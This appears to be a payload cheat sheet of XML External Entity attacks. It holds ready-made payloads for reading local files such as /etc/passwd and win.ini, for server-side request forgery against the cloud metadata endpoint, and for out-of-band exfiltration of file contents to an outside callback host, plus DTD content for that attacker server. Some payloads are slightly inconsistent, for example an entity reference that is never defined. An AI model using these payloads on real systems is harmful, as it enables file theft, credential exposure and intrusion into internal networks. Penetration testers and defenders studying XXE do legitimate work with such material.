
📄 XXE Payloads

XML External Entity exploitation techniques

📁 File Disclosure

Basic File Disclosure (Linux)

Read local files via XXE on Linux systems

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY test SYSTEM 'file:///etc/passwd'>
]>
<root>&test;</root>

Windows File Disclosure

Read Windows system files

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>
]>
<root>&test;</root>

PHP Wrapper XXE

Base64 encode file contents to avoid parsing errors

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY test SYSTEM 'php://filter/convert.base64-encode/resource=/etc/passwd'>
]>
<root>&test;</root>

🌐 SSRF via XXE

Internal Network SSRF

Make requests to internal services and cloud metadata

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY test SYSTEM 'http://169.254.169.254/latest/meta-data/'>
]>
<root>&test;</root>

🔊 Out-of-Band XXE

OOB XXE with External DTD

Exfiltrate data to external callback server

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "https://callback.l4ughingm4n.dev/xxe.dtd">
  %dtd;
]>
<root>&send;</root>

Parameter Entity XXE

Use parameter entities for filter bypasses

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://callback.l4ughingm4n.dev/?x=%file;'>">
  %eval;
  %exfil;
]>

External DTD File

Content for xxe.dtd on your callback server

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://callback.l4ughingm4n.dev/?x=%data;'>">